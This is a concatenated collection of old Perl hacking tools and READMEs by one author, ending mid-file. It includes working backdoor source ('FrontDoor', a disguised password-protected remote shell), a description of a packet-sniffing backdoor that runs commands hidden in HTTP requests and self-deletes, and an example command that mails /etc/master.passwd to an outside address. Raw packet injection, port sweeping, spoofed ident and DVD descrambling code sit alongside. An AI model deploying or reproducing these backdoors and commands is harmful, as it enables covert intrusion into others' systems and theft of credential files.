-v: VERBOSE
    This will display all the files being accessed and
    will also list when CGIs are found and attempted to
    be broken (to find vulnerabilities).  Cannot be used
    with status bar, although a status bar is ALWAYS
    displayed when the user unexpectedly exits or kills the
    application (^C) or when the application is finished
    crawling.

<http://host.name>: Hostname or IP of host to scan. [REQUIRED]
    For example, http://cobra.LucidX.com

[:port]: Port to connect to, default is 80.
    For example, http://cobra.LucidX.com:80

[/start/page]: Page to start on.
    For example, http://cobra.LucidX.com/screamingCobra-1.03/
    and also,    http://cobra.LucidX.com:80/index.html


   __________________________________
6. __ SUPPORTED OPERATING SYSTEMS  __
   ==================================
screamingCobra will work on ANY operating system that has
Perl 5.x.

I also compiled a binary for
Windows, sCobra-WIN.exe.

This will be recompiled for every new version of
screamingCobra and will be included in all releases.


===================
== END OF README ==
===================
That's all for now.
Contact me (Samy Kamkar) at commport5@LucidX.com for
questions or comments, hope to hear from you all! :)

http://samy.pl/scobra/downloads/CURRENT/
#!/usr/bin/perl

# by CommPort5[@LucidX.com] (samy)
# opens a pty instead of just a plain connection so ansi can get through, PoC

$login = 0;           # if = 1, use $loginbin to login as a regular user
                      # if = 0, use it's own username and password
# login not active yet!
$0 = "FrontDoor";      # what to show instead of 'perl frontdoor.pl' in a ps
$pwprompt = 2;        # if = 2, prompts you for a username and password
                      # if = 1, prompts you for a password
                      # if = 0, accepts the password (but no text is shown)
$amtusers = 02;       # amount of connections allowed at once
$username = "cp5";    # username (required, but only used if $pwprompt = 1 or 2)
$password = "passwd"; # password
$port = 11223;        # port to bind to
$bindtoip = 0;        # if = 1, binds to $ip
                      # if = 0, ignores $ip and binds to default IP
$ip = "123.45.67.89"; # binds to this ip only if $bindtoip = 1
$loginbin = "/usr/bin/login"; # path to `login` bin

use blib;
use Cwd;
use IO::Pty;
use IO::Socket;
use Term::ANSIColor;
require POSIX;
defined($fork = fork());
($fork) && die "FrontDoor running on PID $fork\n";
$ver = "0.1b2";
if($bindtoip) {
 $x = IO::Socket::INET->new(
  LocalPort => $port,
  LocalAddr => $ip,
  Listen => $amtusers,
  Proto => 'tcp',
  Reuse => 1)
  or die "Unable to bind to socket: $!\n";;
}
else {
 $x = IO::Socket::INET->new(
  LocalPort => $port,
  Listen => $amtusers,
  Proto => 'tcp',
  Reuse => 1)
  or die "Unable to bind to socket: $!\n";
}
while(my $c = $x->accept) {
 die unless defined(my $child = fork());
 if ($child == 0) {
  $x->close;
  interact($c);
  exit 0;
 }
}
continue {
 $c->close;
}
sub interact {
 my $s = shift;
 STDIN->fdopen($s, "r");
 STDOUT->fdopen($s, "w");
 STDERR->fdopen($s, "w");
 STDOUT->autoflush(1);
 if($pwprompt == 2) {
  print colored("\nWelcome! ", 'red');
  print "This host is running ";
  print colored("FrontDoor ", 'bold');
  print colored("[$0] ", 'bold blue');
  print colored("v.$ver\n\n", 'bold red');
  print "Login: ";
  chomp($us = <STDIN>);
  print "Password: ";
 }
 if($pwprompt == 1) {
  print colored("\nWelcome! ", 'red');
  print "This host is running ";
  print colored("FrontDoor ", 'bold');
  print colored("[$0] ", 'bold blue');
  print colored("v.$ver\n\n", 'bold red');
  print "\nPassword: ";
 }
 chomp($x = <STDIN>);
 if($pwprompt == 2 and $us !~ /^$username/i) {
  die "\nIncorrect username or password\n";
  close($x);
 }
 if($x =~ /^$password/) {
  print "\n";
  do {
   $pwd = cwd;
   print "pt";
   print colored("SH", 'bold');
   print colored("[", 'bold blue');
   print colored("$username", 'red');
   print colored("\@", 'bold green');
   print colored("$pwd", 'yellow');
   print colored("]", 'bold blue');
   print colored("\$", 'underline bold blink black on_white');
   print " ";
   chomp($y = <STDIN>);
   if($y =~ /^\s*exit/) {
    die "Good bye, $username!\n";
   }
   else {
    @cm = split(/\s+/, $y);
    $pty = new IO::Pty;
    if(@cm and $cm[0] =~ /^cd$/) {
     chdir($cm[1]);
     $num = 2;
     while($cm[$num]) {
      $nc .= $cm[$num];
      $num++;
     }
     @cm = split(/\s+/, $nc);
    }
    if(@cm and $cm[0] !~ /^cd$/) {
     my $pid = fork;
     die "Cannot fork: $!" if($pid < 0);
     if($pid) {
      parent($pty);
     }
     else {
      child($pty);
     }
    }
    sub child {
     my($pty) = @_;
     POSIX::setsid();
     my $tty = $pty->slave;
     close($pty);
     open(STDIN, "<&".fileno($tty)) || (sleep(5), die "Cannot open STDIN");
     open(STDOUT, ">&".fileno($tty)) || (sleep(5), die "Cannot open STDOUT");
     open(STDERR, ">&STDOUT") || (sleep(5), die "Cannot open STDERR");
     close($tty);
     my $prog = shift(@cm);
     if(!@cm && $prog =~ /sh$/) {
      exec $prog '-sh'
     }
     exec($prog, @cm);
     die "Unable to execute\n";
    }
    sub process {
     my($rin, $src, $dst) = @_;
     my $buf = '';
     my $read = sysread($src, $buf, 1);
     if(defined $read && $read) {
      syswrite($dst, $buf, $read);
     }
     else {
      vec($rin, fileno($src), 1) = 0;
     }
     return $rin;
    }
    sub parent {
     my($pty) = @_;
     my $tty = $pty;
     my($rin, $win, $ein) = ('', '', '');
     vec($rin, fileno(STDIN), 1) = 1;
     vec($rin, fileno($tty), 1) = 1;
     vec($win, fileno($tty), 1) = 1;
     vec($ein, fileno($tty), 1) = 1;
     select($tty);
     $| = 1;
     select(STDOUT);
     $| = 1;
     while(1) {
      my($rout, $wout, $eout, $timeleft);
      ($nfound, $timeleft) = select($rout = $rin, $wout = $win, $eout = $ein, 3600);
      die "select failed: $!" if($nfound < 0);
      if($nfound > 0) {
       if(vec($eout, fileno($tty), 1)) {
       }
       if(vec($rout, fileno($tty), 1)) {
        $rin = process($rin, $tty, STDOUT);
        last unless(vec($rin, fileno($tty), 1));
       }
       elsif(vec($rout, fileno(STDIN), 1) && vec($wout, fileno($tty), 1)) {
        $rin = process($rin, STDIN, $tty);
       }
      }
     }
    }
   }
  }
  while(1);
}
else {
  if($pwprompt == 2) {
   die "\nIncorrect username or password\n";
   close($x);
  }
  if($pwprompt == 1) {
   die "\nIncorrect password\n";
   close($x);
  }
  if($pwprompt == 0) {
   die "\n";
   close($x);
  }
 }
}


#!/usr/bin/perl

# by samy [commport5@lucidx.com]
# requires pdump::Sniff - http://secure.lucidx.com/pdump-devel.tar.gz [pdump.lucidx.com/pdump.tar.gz but it's older]

use pdump::Sniff;
use Tk;
$mdb = MainWindow->new();
@iphdr = qw(version ihl tos tot_len id frag_off ttl protocol check saddr daddr);
@tcphdr = qw(source dest seq ack_seq doff res1 res2 urg ack psh rst syn fin window check urg_ptr data);
@udphdr = qw(source dest len check data);
@icmphdr = qw(type code check gateway id sequence unused mtu data);
$mdb->title(" Raw Packet Injector");
$status = $mdb->Label(-width => 30, -relief => "sunken", -bd => 1);
$status->pack(-side => "bottom", -fill => "y", -padx => 2, -pady => 1);
$mhead = $mdb->Frame(-relief => 'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'nw', -side => 'top');
$mright = $mdb->Frame(-relief => 'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'ne', -side => 'right');
$mright->Label(-text => 'Packet Type')->pack(-fill => 'x', -anchor => 'nw', -side => 'top');
@typerad = ('TCP', 'UDP', 'ICMP');
for my $type (0 .. 2) {
 $mright->Radiobutton(-text => "$typerad[$type]", -variable => \$dbtype, anchor => 'w', -relief => 'flat', -value => $type)->pack(-side => 'top');
}
$mright->Label(-text => "\nPackets")->pack;
$speed = $mright->Entry(-borderwidth => 2, -width => 8)->pack;
$speed->insert('end', "1");
$mright->Label(-text => "\n")->pack;
$mright->Button(-text => "TCP Headers", -command => \&tcph)->pack;
$mright->Button(-text => "UDP Headers", -command => \&udph)->pack;
$mright->Button(-text => "ICMP Headers", -command => \&icmph)->pack;
$mw1 = $mdb->Frame()->pack(-side => 'left', -pady => 2, -padx => 15);
$mw1->Label(-text => "IP Headers\n", -anchor => 'e')->pack;
foreach (0 .. 20) {
 if ($iphdr[$_]) {
  $x{$_} = $mw1->Frame();
  $x{$_}->pack(-pady => '2', -anchor => 'e');
  $tmp = $x{$_}->Label(-text => $iphdr[$_], -anchor => 'e');
  $t = "ip_$iphdr[$_]";
  ${$t} = $x{$_}->Entry(-width => '17', -relief => 'sunken')->pack(-side => 'right');
  $tmp->pack(-side => 'right');
 }
}
$balloon = $mdb->Balloon(-statusbar => $status);
$btnok = $mhead->Button(-text => 'Send');
$btnok->configure(-command => \&write);
$btnok->pack(-side => 'left', -padx => '2');
$balloon->attach($btnok, -balloonmsg => "Send packet(s)", -statusmsg => "Send packet(s)");
$btnsave = $mhead->Button(-text => 'Information');
$btnsave->configure(-command => \&info);
$btnsave->pack(-side => 'left', -padx => '2');
$balloon->attach($btnsave, -balloonmsg => "Valuable Information", -statusmsg => "Information on this program");
$btncancel = $mhead->Button(-text => 'Exit', -command => [$mdb,'destroy']);
$btncancel->pack(-side => 'left', -padx => '2');
$balloon->attach($btncancel, -balloonmsg => "Exit Program", -statusmsg => "Exit Program");
MainLoop;
sub write {
 my (%ttcp, %tip, %ip, %tcp, %udp, %icmp, %ticmp, %tudp);
 foreach (@tcphdr) {
  $t = "tcp_$_";
  if (${$t}) {
   $ttcp{$_} = ${$t};
  }
 }
 foreach (@iphdr) {
  $t = "ip_$_";
  if (${$t}) {
   $tip{$_} = get ${$t};
  }
 }
 foreach (keys(%tip)) {
  if ($tip{$_}) {
   $ip{$_} = $tip{$_};
  }
 }
 foreach (keys(%ttcp)) {
  if ($ttcp{$_}) {
   $tcp{$_} = $ttcp{$_};
  }
 }
 foreach (@udphdr) {
  $t = "udp_$_";
  if (${$t}) {
   $tudp{$_} = ${$t};
  }
 }
 foreach (keys(%tudp)) {
  if ($tudp{$_}) {
   $udp{$_} = $tudp{$_};
  }
 }
 foreach (@icmphdr) {
  $t = "icmp_$_";
  if (${$t}) {
   $ticmp{$_} = ${$t};
  }
 }
 foreach (keys(%ticmp)) {
  if ($ticmp{$_}) {
   $icmp{$_} = $ticmp{$_};
  }
 }
 $sp = get $speed;
 foreach (1 .. $sp) {
  $a = new pdump::Sniff;
  if ($dbtype == 0) {
   $a->set({ip => { %ip }, tcp => { %tcp }});
  }
  elsif ($dbtype == 1) {
   $a->set({ip => { %ip }, udp => { %udp }});
  }
  elsif ($dbtype == 2) {
   $a->set({ip => { %ip }, icmp => { %icmp }});
  }
  $a->send;
 }
}
sub info {
 my $top2 = $mdb->Toplevel;
 $top2->Label(-text => "\n         Perl/Tk Raw Packet Injecting Utility         \n      by samy [CommPort5\@LucidX.com]      \n")->pack;
}
sub tcph {
 $f = $mdb->DialogBox(-title => "TCP Headers", -buttons => ["OK"]);
 $n = $f->add('NoteBook', -ipadx => 6, -ipady => 6);
 $address_p = $n->add("address", -label => "Required", -underline => 0);
 $pref_p = $n->add("pref", -label => "Optional", -underline => 0);
 $address_p->LabEntry(-label => "Source Port Number:", -labelPack => [-side => "left", -anchor => "w"], -width => 20, -textvariable => \$tcp_source)->pack(-side => "top", -anchor => "ne");
 $address_p->LabEntry(-label => "Dest. Port Number:", -labelPack => [-side => "left", -anchor => "w"], -width => 20, -textvariable => \$tcp_dest)->pack(-side => "top", -anchor => "ne");
 foreach (2 .. 20) {
  if ($tcphdr[$_]) {
   $tmp = "tcp_$tcphdr[$_]";
   $pref_p->LabEntry(-label => "$tcphdr[$_]:", -labelPack => [-side => "left"], -width => 15, -textvariable => \${$tmp})->pack(-side => "top", -anchor => "ne");
  }
 }
 $n->pack(-expand => "yes", -fill => "both", -padx => 5, -pady => 5, -side => "top");
 $f->Show;
}
sub udph {
 $f = $mdb->DialogBox(-title => "UDP Headers", -buttons => ["OK"]);
 $n = $f->add('NoteBook', -ipadx => 6, -ipady => 6);
 $address_p = $n->add("address", -label => "Required", -underline => 0);
 $pref_p = $n->add("pref", -label => "Optional", -underline => 0);
 $address_p->LabEntry(-label => "Source Port Number:", -labelPack => [-side => "left", -anchor => "w"], -width => 20, -textvariable => \$udp_source)->pack(-side => "top", -anchor => "ne");
 $address_p->LabEntry(-label => "Dest. Port Number:", -labelPack => [-side => "left", -anchor => "w"], -width => 20, -textvariable => \$udp_dest)->pack(-side => "top", -anchor => "ne");
 foreach (2 .. 5) {
  if ($udphdr[$_]) {
   $tmp = "udp_$udphdr[$_]";
   $pref_p->LabEntry(-label => "$udphdr[$_]:", -labelPack => [-side => "left"], -width => 15, -textvariable => \${$tmp})->pack(-side => "top", -anchor => "ne");
  }
 }
 $n->pack(-expand => "yes", -fill => "both", -padx => 5, -pady => 5, -side => "top");
 $f->Show;
}
sub icmph {
 $f = $mdb->DialogBox(-title => "ICMP Headers", -buttons => ["OK"]);
 $n = $f->add('NoteBook', -ipadx => 6, -ipady => 6);
 $address_p = $n->add("address", -label => "Required", -underline => 0);
 $pref_p = $n->add("pref", -label => "Optional", -underline => 0);
 $address_p->Label(-text => "None", -anchor => 'e')->pack;
 foreach (0 .. 10) {
  if ($icmphdr[$_]) {
   $tmp = "icmp_$icmphdr[$_]";
   $pref_p->LabEntry(-label => "$icmphdr[$_]:", -labelPack => [-side => "left"], -width => 15, -textvariable => \${$tmp})->pack(-side => "top", -anchor => "ne");
  }
 }
 $n->pack(-expand => "yes", -fill => "both", -padx => 5, -pady => 5, -side => "top");
 $f->Show;
}


#!/usr/bin/perl

# -cp5

use pdump::Sniff;

@iphdr = qw(version ihl tos tot_len id frag_off ttl protocol check saddr daddr);
@tcphdr = qw(source dest seq ack_seq doff res1 res2 urg ack psh rst syn fin window check urg_ptr data);
foreach (@iphdr) {
 print "IP: $_";
 if (/^(s|d)addr$/i) {
  print " [required]";
 }
 print ": ";
 chomp ($ip{$_} = <STDIN>);
}
foreach (@tcphdr) {
 print "TCP: $_";
 if (/^source|dest$/i) {
  print " [required]";
 }
 print ": ";
 chomp ($tcp{$_} = <STDIN>);
}
foreach (keys(%ip)) {
 if ($ip{$_}) {
  $hip{$_} = $ip{$_};
 }
}
foreach (keys(%tcp)) {
 if ($tcp{$_}) {
  $htcp{$_} = $tcp{$_};
 }
}
$a = new pdump::Sniff;
$a->set({ip => { %hip }, tcp => { %htcp }});
$a->send;


#!/usr/bin/perl

use pdump::Sniff;
use Net::Ping;

die "usage: $0 <host>\n" unless @ARGV == 1;
$| = 1;
$tout = 10;
$host = $ARGV[0];
$dev = pdump::Sniff::lookupdev($tout);
$ip = ${ifaddrlist()}{$dev};
$packet_tcp = new pdump::Sniff({tcp=>{}});
$filt_tcp = "ip proto \\tcp and src host $host and dst host $ip";
$pcap_tcp = $packet_tcp->pcapinit($dev, $filt_tcp, 1500, 60, 0);
$offset_tcp = linkoffset($pcap_tcp);
$p = Net::Ping->new("icmp");
if ($p->ping($host, 2)) {
 die "ICMP reply from $host recieved, host is up\n";
}
$p->close();
print "No ICMP reply...testing TCP\n";
if ($fork1 = fork) {
 &send;
}
if ($fork2 = fork) {
 loop $pcap_tcp, -1, \&check_tcp, \@packet_tcp;
}
sub check_tcp{
 print "TCP reply from $host recieved, host is up\n";
 kill(9, $fork1);
 die "\n";
}
sub send {
 sleep 3;
 foreach (1 .. 65535) {
  $a = new pdump::Sniff;
  $a->set({
   ip => {
        saddr => $ip,
        daddr => $host,
        },
   tcp => {
        dest => $_,
        source => 1337,
        seq => 31337,
        syn => 1,
        },
  });
  $a->send;
 }
 die "No TCP reply...host seems to not be up\n";
}


#!/usr/bin/perl

# stand-alone raw wanna-be-ident daemon
# PoC by commport5

use pdump::Sniff;
die "usage: $0 <port>\n" unless @ARGV == 1;
$| = 1;
$tout = 10;
$dev = pdump::Sniff::lookupdev($tout);
$ip_addr = ${ifaddrlist()}{$dev};
$packet_tcp = new pdump::Sniff({tcp=>{}});
$filt_tcp = "ip proto \\tcp and dst port $ARGV[0]";
$pcap_tcp=$packet_tcp->pcapinit($dev,$filt_tcp,1500,60);
$offset_tcp = linkoffset($pcap_tcp);
if (fork) {
 loop $pcap_tcp, -1, \&check_tcp, \@packet_tcp;
}
sub check_tcp{
 $packet_tcp->bset($_[2], $offset_tcp);
 my $headers;
 my ($vers,$ihl,$tos,$tot,$id,$frg,$ttl,$pro,$chc,$saddr,$daddr,$sport,$dport,$seq,$aseq,$dof,$res1,$res2,$urg,$ack,$psh,$rst,$syn,$fin,$win,$chk,$data) =
 $packet_tcp->get({ip=>['version','ihl','tos','tot_len','id','frag_off','ttl','protocol','check','saddr','daddr'],tcp=>[
 'source','dest','seq','ack_seq','doff','res1','res2','urg','ack','psh','rst','syn','fin','window','check','data']});
 if ($urg) {
  $headers .= "U";
 }
 if ($ack) {
  $headers .= "A";
 }
 if ($psh) {
  $headers .= "P";
 }
 if ($rst) {
  $headers .= "R";
 }
 if ($syn) {
  $headers .= "S";
 }
 if ($fin) {
  $headers .= "F";
 }
 unless ($headers) {
  $headers = ".";
 }
 $sname = &ip2dot($saddr);
 $dname = &ip2dot($daddr);
 if ($headers eq "S" and !$sent) {
  $rand = rand;
  $rand =~ s/^0\.(\d{9}).*?$/$1/;
  $a = new pdump::Sniff;
  $a->set({ip => {
  saddr => $dname,
  daddr => $sname }, tcp => {
  dest => $sport,
  source => $dport,
  seq => $rand,
  ack_seq => ($seq - 1),
  ack => 1,
  syn => 1 }});
  $a->send;
  $sent = 1;
 }
 if ($headers eq "P" and $sent == 1) {
  $ndata = "$data : USERID : UNIX :cp5\n";
  $a = new pdump::Sniff;
  $a->set({ip => {
  saddr => $dname,
  daddr => $sname }, tcp => {
  dest => $sport,
  source => $dport,
  seq => $aseq,
  ack_seq => ($seq - length($data)),
  ack => 1 }});
  $a->send;
  $a = new pdump::Sniff;
  $a->set({ip => {
  saddr => $dname,
  daddr => $sname }, tcp => {
  dest => $sport,
  source => $dport,
  seq => $aseq,
  ack_seq => ($seq - length($data)),
  ack => 1,
  psh => 1,
  data => $ndata }});
  $a->send;
  $a = new pdump::Sniff;
  $a->set({ip => {
  saddr => $dname,
  daddr => $sname }, tcp => {
  dest => $sport,
  source => $dport,
  seq => ($aseq - length($ndata)),
  ack_seq => ($seq - length($data)),
  ack => 1,
  fin => 1 }});
  $a->send;
  $sent = 2;
 }
 if ($headers eq "F" and $sent == 2) {
  $a = new pdump::Sniff;
  $a->set({ip => {
  saddr => $dname,
  daddr => $sname }, tcp => {
  dest => $sport,
  source => $dport,
  seq => $aseq,
  ack_seq => ($seq - 1),
  ack => 1,
  fin => 1 }});
  $a->send;
  $sent = 3;
 }
 if ($headers eq "F" and $sent == 3) {
  $a = new pdump::Sniff;
  $a->set({ip => {
  saddr => $dname,
  daddr => $sname }, tcp => {
  dest => $sport,
  source => $dport,
  seq => $aseq,
  ack_seq => ($seq - 1),
  ack => 1 }});
  $a->send;
  $sent = 0;
 }
}
sub ip2name {
 my $addr = shift;
 (gethostbyaddr(pack("N",$addr),AF_INET))[0] || ip2dot($addr);
}
sub ip2dot {
 sprintf("%u.%u.%u.%u",unpack "C4", pack "N1", shift);
}


Index of /pdoor
 	Name
Last modified
Size
Description

________________________________________
 	Parent Directory
 	-
 	README
06-Apr-2005 00:21	1.0K
 	pcl.pl
06-Apr-2005 00:21	702
 	pdoor.pl
06-Apr-2005 00:21	371
 	pdump-Sniff-0.781.tar.gz
06-Apr-2005 00:21	25K
 	x.html
06-Apr-2005 00:21	53
________________________________________
This is a backdoor (pdoor.pl) which sniffs raw packets
going across the network.  It allows you to run commands
without opening any ports on the machine that the backdoor
is running.  It does this by sniffing all packets on port
80 and 7331.  Usually port 80 is open, so, if you want,
you can use telnet and telnet to some machine on that
network on port 80.  Then you would give it something like
this:
GET / HTTP/2cat /etc/master.passwd|mail user@blah
It will read anything after 'GET / HTTP/2' as a
command.  If port 80 isn't open on any machines on the
network, you can use pcl.pl to send a raw packet with
data to port 7331 (which won't be open, but pdoor.pl
will see the packet anyways).  You can connect to
pretty much any machine on the network, not just the one
which the backdoor running.  This is because pdoor.pl
will try to sniff the entire network.  It also contains
a self destruct feature (it will remove itself and then
die, practically untracable) when you do this:
GET / HTTP/2DIE
If you're using the pcl.pl, you only have to type:
DIE


-cp5
http://www.samy.pl/pdoor/

#!/usr/bin/perl

# server/daemon for netshow [mp3]
# by samy [CommPort5@LucidX.com]

$port = 1337;
$dev = "/dev/dsp";
$mp3dir = "/mp3";
$kilobytes = 64;
$mp3first = 1;

sub hashes {
 %set = (
	create    => 'yes',
	exclusive => 'no',
	mode      => 0644,
	destroy   => 'yes',
 );
 %read = (
	create    => 'no',
	exclusive => 'no',
	mode      => 0644,
	destroy   => 'no',
 );
 return (\%set, \%read);
}
($setx, $readx) = hashes();
%set = %$setx;
%read = %$readx;
tie my $kb, 'IPC::Shareable', 'kilobytes', { %set };
$kb = $kilobytes * 1024;
use IPC::Shareable;
print "Running server on port $port at $kilobytes kb per packet\n";
fork() && front($mp3first, $kb);
fork() && ipc($kilobytes);
sock($port, $mp3dir, $mp3first);

sub front {
 $SIG{INT} = sub { close(DEV); die "exiting...\n"; };
 ($setx, $readx) = hashes();
 %set = %$setx;
 %read = %$readx;
 tie my $kb, 'IPC::Shareable', 'kilobytes', { %set };
 tie my $playmp, 'IPC::Shareable', 'micormp', { %set };
 $playmp = $_[0];
 $kb = $_[1];
 tie my $mp3, 'IPC::Shareable', 'mpeg', { %read };
 while (1) {
  chomp($tmpp = <STDIN>);
  s/^\s*//;
  if ($tmpp =~ /^help/) {
   print << "EOC";

commands:

status - status of stream
mic - switch to microphone
mp3 - switch to mp3s
exit - close daemon
kb [#] - view/change kbps
help - this help

EOC
  }
  elsif ($tmpp =~ /^status/) {
   if ($playmp % 2 == 1) {
    print "status: MP3 playing ($mp3)\n";
   }
   else {
    print "status: microphone in use\n";
   }
  }
  elsif ($tmpp =~ /^kb\s*(\S*)/) {
   if ($1) {
    $kilobytes = $1;
    $kb = $kilobytes * 1024;
   }
   else {
    print "kilobytes: $kilobytes\n";
   }
  }
  elsif ($tmpp =~ /^exit/) {
   close(DEV);
   die "exiting...\n";
  }
  elsif ($tmpp =~ /^mic/) {
   if ($playmp % 2 == 1) {
    $playmp++;
    print "Changing audio input to microphone...\n";
   }
   else {
    print "Microphone already in use.\n";
   }
  }
  elsif ($tmpp =~ /^mp3/) {
   if ($playmp % 2 == 1) {
    print "MP3 already playing.\n";
   }
   else {
    print "Changing audio input to MP3...\n";
    $playmp++;
   }
  }
  elsif ($tmpp !~ /^$/) {
   print "Invalid command...type 'help' for help.\n";
  }
 }
}

sub sock {
 ($setx, $readx) = hashes();
 %set = %$setx;
 %read = %$readx;
 ($port, $mp3dir, $playmp3) = @_;
 tie my $kb, 'IPC::Shareable', 'kilobytes', { %read };
 tie my $mp3, 'IPC::Shareable', 'mpeg', { %set };
 opendir(MPEG, $mp3dir);
 @mp3s = grep { /^[^\.]/ } readdir(MPEG);
 closedir(MPEG);
 use IO::Socket;
 $con = IO::Socket::INET->new(
	LocalPort => $port,
	Listen    => 5,
        Reuse     => 1,
 );
 $con->autoflush(1);
 tie my $tmmp, 'IPC::Shareable', 'micormp', { %read };
 while ($sock = $con->accept) {
  $peerhost = $sock->peerhost();
  print "$peerhost connected\n";
  $child = fork();
  unless ($child) {
   $con->close;
   while ($sock) {
    $mp3 = $mp3s[int(rand(@mp3s))];
    if ($playmp3 % 2 == 1) {
     print $sock "HTTP/1.0 200 OK\n";
     print $sock "Content-Type: audio/x-mp3stream\n";
     print $sock "Cache-Control: no-cache\n";
     print $sock "Pragma: no-cache\n";
     print $sock "Connection: close\n";
     print $sock "x-audiocast-name: CommPort5 owns youz0r!\n\n";
     open(MPEG, "lame -b 32 --resample 44.1 $mp3dir/$mp3 - 2>> /dev/null |");
     while (sysread(MPEG, $au, 32 * 1024)) {
      print $sock $au;
      if ($tmmp % 2 != $playmp3 % 2) {
       $playmp3++;
       last;
      }
     }
     close(MPEG);
    }
    else {
     print $sock "HTTP/1.0 200 OK\n";
     print $sock "Content-Type: audio/x-mp3stream\n";
     print $sock "Cache-Control: no-cache\n";
     print $sock "Pragma: no-cache\n";
     print $sock "Connection: close\n";
     print $sock "x-audiocast-name: CommPort5 owns you!\n\n";
     while (     tie $aud, 'IPC::Shareable', 'audio', { %read }){
      print $sock $aud;
      if ($tmmp % 2 != $playmp3 % 2) {
       $playmp3++;
       last;
      }
     }
    }
   }
   exit 0;
  }
 }
}

sub ipc {
 ($kb) = @_;
 ($setx, $readx) = hashes();
 %set = %$setx;
 %read = %$readx;
 open(DEV, "sox -w -t ossdsp $dev -t wav - speed 0.5 2>>/dev/null | lame -b 32 --resample 44.1 - - 2>> /dev/null|") or die
"Can't open sox/lame: $!\n";
 while (tie  $aud, 'IPC::Shareable', 'audio', { %set }) {
  sysread(DEV, $aud, 32 * 1024);
 }
}


#!/usr/bin/perl

# RC4 in 146 bytes of code
#
# usage:  echo 'plain text' | rc4.pl hexkey > encrypted.file
#        or
#         cat /path/to/file | rc4.pl hexkey > encrypted.file
# e.g., echo testing | rc4.pl a0b1c2d3
#
# decrypting goes the same way
# e.g., cat encrypted.file | rc4.pl a0b1c2d3 > decrypted.file
#
# -samy [cp5@LucidX.com]

sub f{@s[$x,$y]=@s[($y+=$s[$x])%=@s,$x];$s[$x++]+$s[$y]-@s}@k=pop=~/../g;f$y+=hex$k[$x%@k]for@s=0..255;$x=1;$y=0;$/=\1;print$_^chr$s[f$x%=@s]for<>


#!/usr/bin/perl

# 1st place in toorcon password challenge
# challenge was to create a program or algorithm that generates a password
# for a user that's difficult for people to crack or brute force but is easy
# for the user to remember (takes a word as a command line arguement and randomly
# modifies it with a simple algorithm)
# i shortened and obfuscated it just to be cool :)
# -cp5

s''%{uc c}=(a,4,b,6,e,3,i,1,l,1,t,7);for(keys%{uc c}){C{uc}=C{_};C{C{_}}=_}
for(0..Z2){myB;for(split//,ARGV[0]){_=C{_}ifC{_}&&int Z2;B.=_}Z2?D.=reverseB:D.=B}
print"D\n"';s/Z/rand /g;s/[A-D_]/\$$&/g;eval

# cp5 crypt functions

# create an encrypted password
sub mkpasswd {
 $what = $_[0];
 $salt = chr(65+rand(27)).chr(65+rand(27));
 $salt =~ s/\W/x/g;
 return crypt($what, $salt);
}

# check an encrypted password with a non-encrypted one
sub ckpasswd {
 ($plain, $encrypted) = @_;
 if (!$encrypted) {
  ($plain, $encrypted) = split(/\s+/, $plain, 2);
 }
 return '' unless ($plain && $encrypted);
 if ($encrypted =~ /^\$\d\$(\w\w)\$/) {
  $salt = $1;
 }
 else {
  $salt = substr($encrypted, 0, 2);
 }
 return ($encrypted eq crypt($plain, $salt));
}

1;
#!/usr/bin/perl

# MPEG 2 PS VOB file on stdin -> descrambled output on stdout
# arguments: title key bytes in least to most-significant order

# perl -I xx:xx:xx:xx:xx cp5qrpff-fast.pl < file.vob | extract_mpeg2 | mpeg2dec
# where xx:xx:xx:xx:xx is the title key

s''while(read+STDIN,_,2048){Q=29;O=73;J=142;P=255;@t=map{_%16orP^=J^=(Y
=(11,10,116,100,11,122,20,100)[_/16%8])&110;P^=(72,@z=(64,72,Q^=12*(_%
16-2?0:Y&17)),O^=_%64?12:0,@z)[_%8]}(16..271);if((@a=unx"C*",_)[20]&48){
X=5;_=unxb24,join"",@b=map{xB8,unxb8,chr(_^$a[--X+84])}@ARGV;s/...$/1$&/;
K=unxV,xb25,_;L=256|(ord$b[4])<<9|ord$b[3];K=K>>8^(M=P&(K>>12^K>>4^K^K/8
))<<17,L=L>>8^(P&(W=(Z=L>>14&7^L)^Z*8^Z<<6))<<9,_=$t[_]^((X>>=8)+=M+(~W&P
))for@a[128..$#a]}print+x"C*",@a}';s/x/pack+/g;s/[O-QJ-MW-Z_]/\$$&/g;eval


#!/usr/bin/perl

# MPEG 2 PS VOB file on stdin -> descrambled output on stdout
# arguments: title key bytes in least to most-significant order

s''while(read+STDIN,_,2048){P=29;J=142;if((@a=unx"C*",_)[20]&48){M=5;_=
unxb24,join"",@b=map{xB8,unxb8,chr(_^$a[--M+84])}@ARGV;s/...$/1$&/;X=unx
V,xb25,_;Q=73;Y=256|(ord$b[4])<<9|ord$b[3];X=X>>8^(K=(Z=255)&(X>>12^X>>
4^X^X/8))<<17,Y=Y>>8^(Z&(L=(W=Y>>14&7^Y)^W*8^W<<6))<<9,_=(map{_%16orZ^=J
^=(O=(11,10,116,100,11,122,20,100)[_/16%8])&110;Z^=(72,@z=(64,72,P^=12*
(_%16-2?0:O&17)),Q^=_%64?12:0,@z)[_%8]}(16..271))[_]^((M>>=8)+=K+(~L&Z)
)for@a[128..$#a]}print+x"C*",@a}';s/x/pack+/g;s/[W-ZJ-MO-Q_]/\$$&/g;eval


#!/usr/bin/perl

# 3 rotor German Enigma simulation
# by samy [CommPort5@LucidX.com]

@rotors = (
 [ split(//, "ABCDEFGHIJKLMNOPQRSTUVWXYZ") ],
 [ split(//, "EKMFLGDQVZNTOWYHXUSPAIBRCJ") ],
 [ split(//, "AJDKSIRUXBLHWTMCQGZNPYFVOE") ],
 [ split(//, "BDFHJLCPRTXVZNYEIWGAKMUSQO") ],
 [ split(//, "ESOVPZJAYQUIRHXLNFTGKDCMWB") ],
 [ split(//, "VZBRGITYUPSDNHLXAWMJQOFECK") ]
);
@ref = split(//, "YRUHQSLDPXNGOKMIEBFZCWVJAT");
$flag = 0;
$n = 0;
@order = (3, 1, 2);
@notch = (ints('Q'), ints('E'), ints('V'), ints('J'), ints('Z'));
@rings = (ints('W'), ints('X'), ints('T'));
@pos = (ints('A'), ints('W'), ints('E'));
@plug = (ints('A'), ints('M'), ints('T'), ints('E'));

sub ints {
 return unpack("C*", $_[0]);
}

while (<STDIN>) {
 if ($_ !~ /^\s*\n$/) {
  chomp($tmp = $_);
  foreach (split(//, $tmp)) {
   $ch = uc($_);
   if ($ch !~ /^\w+$/) {
    next;
   }
   $pos[0]++;
   if ($pos[0] > ints 'Z') {
    $pos[0] -= 26;
   }
   if ($flag) {
    $pos[1]++;
